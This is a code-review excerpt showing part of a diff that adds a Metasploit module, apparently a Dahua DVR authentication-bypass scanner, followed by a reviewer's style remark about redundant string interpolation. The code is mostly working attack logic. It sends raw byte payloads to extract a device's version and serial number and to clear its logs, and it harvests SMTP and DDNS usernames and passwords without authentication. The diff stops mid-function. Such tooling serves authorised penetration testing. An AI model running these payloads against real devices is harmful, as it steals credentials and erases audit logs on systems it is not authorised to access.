modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb

```diff
@@ -0,0 +1,395 @@
+  # Payload to grab the Serial Number of the DVR
+  SN = "\xa4\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00" \
+       "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+  # Payload to clear the logs of the DVR
+  CLEAR_LOGS1 = "\x60\x00\x00\x00\x00\x00\x00\x00\x90\x00\x00\x00\x00\x00\x00\x00" \
+               "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+  CLEAR_LOGS2 = "\x60\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00" \
+                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+
+  def setup
+    @password = datastore['PASSWORD']
+    @password ||= Rex::Text.rand_text_alpha(6)
+  end
+
+  def grab_version
+    connect
+    sock.put(VERSION)
+    data = sock.get_once
+    return unless data =~ /[\x00]{8,}([[:print:]]+)/
+    ver = Regexp.last_match[1]
+    print_good("#{peer} -- version: #{ver}")
+  end
+
+  def grab_serial
+    connect
+    sock.put(SN)
+    data = sock.get_once
+    return unless data =~ /[\x00]{8,}([[:print:]]+)/
+    serial = Regexp.last_match[1]
+    print_good("#{peer} -- serial number: #{serial}")
+  end
+
+  def grab_email
+    connect
+    sock.put(EMAIL)
+    return unless (response = sock.get_once)
+    data = response.split('&&')
+    print_good("#{peer} -- Email Settings:")
+    return unless data.first =~ /([\x00]{8,}(?=.{1,255}$)[0-9A-Z](?:(?:[0-9A-Z]|-){0,61}[0-9A-Z])?(?:\.[0-9A-Z](?:(?:[0-9A-Z]|-){0,61}[0-9A-Z])?)*\.?+:\d+)/i
+    if mailhost = Regexp.last_match[1].split(':')
+      print_status("  Server: #{mailhost[0]}") unless mailhost[0].blank?
+      print_status("  Server Port: #{mailhost[1]}") unless mailhost[1].blank?
+      print_status("  Destination Email: #{data[1]}") unless data[1].blank?
+      mailserver = "#{mailhost[0]}"
+      mailport = "#{mailhost[1]}"
+    end
+    return unless data[5].blank? && data[6].blank?
+    print_good("  SMTP User: #{data[5]}")
+    print_good("  SMTP Password: #{data[6]}")
+    muser = "#{data[5]}"
+    mpass = "#{data[6]}"
+    return unless mailserver.blank? && mailport.blank? && muser.blank? && mpass.blank?
+    report_email_creds(mailserver, mailport, muser, mpass)
+  end
+
+  def grab_ddns
+    connect
+    sock.put(DDNS)
+    return unless (response = sock.get_once)
+    data = response.split(/&&[0-1]&&/)
+    ddns_table = Rex::Ui::Text::Table.new(
+      'Header' => 'Dahua DDNS Settings',
+      'Indent' => 1,
+      'Columns' => ['DDNS Service', 'DDNS Server', 'DDNS Port', 'Domain', 'Username', 'Password']
+    )
+    data.each_with_index do |val, index|
+      next if index == 0
+      val = val.split("&&")
+      ddns_service = "#{val[0]}"
+      ddns_server = "#{val[1]}"
+      ddns_port = "#{val[2]}"
+      ddns_domain = "#{val[3]}"
+      ddns_user = "#{val[4]}"
+      ddns_pass = "#{val[5]}"
+      ddns_table << ["#{ddns_service}", "#{ddns_server}", "#{ddns_port}", "#{ddns_domain}", "#{ddns_user}", "#{ddns_pass}"]
```

Comment:
There is no need to put all of these in quotes here or on the lines above when you are first assigning `ddns_*`.